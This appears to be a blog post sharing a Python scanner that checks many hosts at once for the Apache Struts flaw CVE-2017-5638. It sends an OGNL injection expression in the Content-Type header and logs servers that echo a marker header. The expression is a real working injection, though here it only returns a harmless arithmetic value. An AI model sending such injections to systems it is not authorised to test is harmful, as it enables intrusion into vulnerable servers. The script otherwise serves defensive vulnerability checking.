
Quick script to check your hosts for CVE-2017-5638

Here is my quick-and-dirty Python script for checking many hosts at once for the infamous CVE-2017-5638.

Usage: python cve2017-5638_poc.py %url_list_file%
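Vulnerable hosts are appended to the vulnerable_list.csv file. A host is reported when a response header carries the value 9306000 (3000*3102), which the request's Content-Type expression asks the server to return in an X-Check-Struts header.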

"""By Nick Babkin
Usage: python cve2017-5638_poc.py %url_list_file%
Vulnerable hosts are exported to vulnerable_list.csv file"""
#!/usr/bin/python
import requests
import sys
import csv

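def bulkchecker():
    """Check every host in the list file for CVE-2017-5638 over HTTP and HTTPS.

    Hosts are read from the file named by ``sys.argv[1]``, one per row. Each
    host gets a GET request on ``http://`` and on ``https://`` whose
    Content-Type header carries an expression asking the server to add an
    ``X-Check-Struts`` response header with the value 3000*3102. A response
    that carries ``X-Check-Struts: 9306000`` shows the expression was
    evaluated, and the URL is printed and appended to ``vulnerable_list.csv``.

    The two schemes are checked independently, so a host that answers on only
    one of them is still assessed. A host that does not answer, or whose
    request fails for any other reason, is skipped without output; absence
    from the output file therefore means "not confirmed", not "patched".
    """
    marker_header = 'X-Check-Struts'
    # 3000*3102: only a server that evaluated the expression can return it.
    checkstring = "9306000"
    payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Check-Struts',3000*3102)}.multipart/form-data"
    headers = {'Content-Type': payload, 'User-Agent': 'Mozilla/5.0'}

    # 'rb' is what the Python 2 csv module expects; under Python 3 the file
    # would have to be opened in text mode with newline=''.
    with open(sys.argv[1], 'rb') as csv_file:
        for row in csv.reader(csv_file):
            host = "".join(row).strip()
            if not host:
                # A blank row would become the invalid URL "http://".
                continue
            url_http = "http://" + host
            url_https = "https://" + host
            print("Checking " + url_http + " and " + url_https + " ...")
            for url in (url_http, url_https):
                try:
                    # verify=False lets hosts with self-signed or expired
                    # certificates be checked, but the answer is then not
                    # authenticated. requests also follows redirects by
                    # default, so the header may come from the redirect
                    # target rather than the listed host. Confirm a hit
                    # against the host itself before acting on it.
                    response = requests.get(url, headers=headers, verify=False, timeout=3)
                except requests.exceptions.RequestException:
                    # One scheme failing must not hide the other scheme's result.
                    continue
                # Match the marker header by name: comparing every header
                # value would flag an unrelated header that happens to hold
                # the same number.
                if response.headers.get(marker_header) == checkstring:
                    print(url + " is VULNERABLE")
                    with open('vulnerable_list.csv', 'a') as vulnerable_list:
                        vulnerable_list.write(url + "\n")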



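if __name__ == "__main__":
    # bulkchecker() reads sys.argv[1]; without the list-file argument it would
    # stop with an IndexError traceback instead of a usage message.
    if len(sys.argv) < 2:
        sys.exit("Usage: python cve2017-5638_poc.py %url_list_file%")
    bulkchecker()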

by Nick Babkin, (c) 2016-2017